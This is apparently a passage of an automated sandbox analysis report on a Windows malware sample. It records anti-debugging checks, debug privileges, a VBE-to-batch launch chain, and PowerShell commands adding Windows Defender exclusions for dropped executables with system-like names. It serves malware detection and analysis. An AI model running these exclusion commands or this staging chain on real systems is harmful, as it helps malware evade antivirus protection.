Source: driverInto.exe, 00000004.00000002.1978002789.000000001B88F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll >
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe API call chain: ExitProcess graph end node
Source: C:\portintosvc\driverInto.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_0101F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0101F838
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_01027DEE mov eax, dword ptr fs:[00000030h] 0_2_01027DEE
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_0102C030 GetProcessHeap, 0_2_0102C030
Enables debug privileges
Source: C:\portintosvc\driverInto.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_0101F9D5 SetUnhandledExceptionFilter, 0_2_0101F9D5
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_0101F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0101F838
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_0101FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0101FBCA
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_01028EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_01028EBD
Source: C:\portintosvc\driverInto.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Adds a directory exclusion to Windows Defender
Source: C:\portintosvc\driverInto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\XXPWErhsUbDrk.exe'
Source: C:\portintosvc\driverInto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe'
Source: C:\portintosvc\driverInto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\My Documents\My Pictures\XXPWErhsUbDrk.exe'
Source: C:\portintosvc\driverInto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows defender\services.exe'
Source: C:\portintosvc\driverInto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Registration\csrss.exe'
Source: C:\portintosvc\driverInto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\portintosvc\driverInto.exe'
Source: C:\portintosvc\driverInto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\XXPWErhsUbDrk.exe' Jump to behavior
Source: C:\portintosvc\driverInto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe' Jump to behavior
Source: C:\portintosvc\driverInto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\My Documents\My Pictures\XXPWErhsUbDrk.exe' Jump to behavior
Source: C:\portintosvc\driverInto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows defender\services.exe' Jump to behavior
Source: C:\portintosvc\driverInto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Registration\csrss.exe' Jump to behavior
Source: C:\portintosvc\driverInto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\portintosvc\driverInto.exe' Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\portintosvc\X5ZTZfC.vbe" Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\portintosvc\6iyrEfS0qZMUeKUvqyCENK8F6bD2a9LOXf0Mm.bat" " Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\portintosvc\driverInto.exe "C:\portintosvc/driverInto.exe" Jump to behavior
Source: C:\portintosvc\driverInto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\XXPWErhsUbDrk.exe' Jump to behavior
Source: C:\portintosvc\driverInto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe' Jump to behavior
Source: C:\portintosvc\driverInto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\My Documents\My Pictures\XXPWErhsUbDrk.exe' Jump to behavior
Source: C:\portintosvc\driverInto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows defender\services.exe' Jump to behavior
Source: C:\portintosvc\driverInto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Registration\csrss.exe' Jump to behavior
Source: C:\portintosvc\driverInto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\portintosvc\driverInto.exe' Jump to behavior
Source: C:\portintosvc\driverInto.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\28moAYly7n.bat" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe "C:\Users\Default User\My Documents\My Pictures\XXPWErhsUbDrk.exe"
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_01010723 cpuid 0_2_01010723
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: GetLocaleInfoW,GetNumberFormatW, 0_2_0101AF0F
Queries the volume information (name, serial number etc) of a device
Source: C:\portintosvc\driverInto.exe Queries volume information: C:\portintosvc\driverInto.exe VolumeInformation Jump to behavior
Source: C:\portintosvc\driverInto.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
